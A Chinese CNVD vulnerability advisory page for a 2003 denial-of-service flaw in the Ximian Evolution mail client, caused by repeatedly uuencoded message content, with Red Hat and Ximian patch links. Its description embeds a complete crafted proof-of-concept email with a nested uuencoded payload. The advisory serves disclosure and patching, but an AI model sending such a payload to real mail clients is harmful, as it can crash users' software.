登录  免费注册
当前位置:首页 > 漏洞详细信息

CNVD-2003-0765

 关注(0)  
CNVD-ID CNVD-2003-0765
公开日期 2003-03-17
危害级别
影响产品 (暂无)
其他 ID CNCVE-20030129
CNCVE-20030129
CNCVE-20030129
CNCVE-20030129
CNCVE-20030129
CNCVE-20030129
漏洞描述 XimiaXimian Evolution,这是一个面向Linux平台的集成个人信息管理解决方案。Ximian Evolution Mail User Agent 1.2.2 以及之前版本存在拒绝服务攻击漏洞。远程攻击者通过发送一个经过多次uuencode编码后的邮件内容,服务器会尝试分配大量内存直到崩溃,3次uuedcode可能导致系统由于资源耗竭而崩溃。 测试代码: From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx From: X X. X <xxx@corest.com> To: xxx@corest.com Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 --=3D-mTDu5zdJIsixETTwCF5Y Content-Disposition: inline; filename=3Dname Content-Type: application/octet-stream; name=3Dname Content-Transfer-Encoding: 7bit begin 600 phase2 M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310 M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A- ?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@ end --=3D-mTDu5zdJIsixETTwCF5Y-- 修补方案: 安装升级补丁,补丁下载位置:Red Hat Upgrade evolution-1.0.8-11.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm Red Hat Linux 8.0 Red Hat Upgrade evolution-1.0.8-9.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm Red Hat Linux 7.3 Red Hat Upgrade gal-0.19.2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm Red Hat Linux 7.3 Red Hat Upgrade gal-devel-0.19.2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm Red Hat Linux 7.3 Red Hat Upgrade libgal19-0.19.2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm Ximian ------ 升级到1.2.3版本: http://www.ximian.com/products/ximian_evolution/
漏洞类型 通用型漏洞
参考链接 http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0141.html
http://www.redhat.com/support/errata/RHSA-2003-108.html
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:045
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000648
http://marc.theaimsgroup.com/?l=bugtraq&m=104826470527308&w=2
http://oval.mitre.org/oval/definitions/pseudo/OVAL108.html
漏洞解决方案
厂商补丁 (无补丁信息)
验证信息 (暂无验证信息)
报送时间 2003-03-17
收录时间 2003-03-17
更新时间 2003-03-17
漏洞附件 (无附件)
  在发布漏洞公告信息之前,CNVD都力争保证每条公告的准确性和可靠性。然而,采纳和实施公告中的建议则完全由用户自己决定,其可能引起的问题和结果也完全由用户承担。是否采纳我们的建议取决于您个人或您企业的决策,您应考虑其内容是否符合您个人或您企业的安全策略和流程。
(编辑:CNVD) | 已有0条评论
登录 后才能发表评论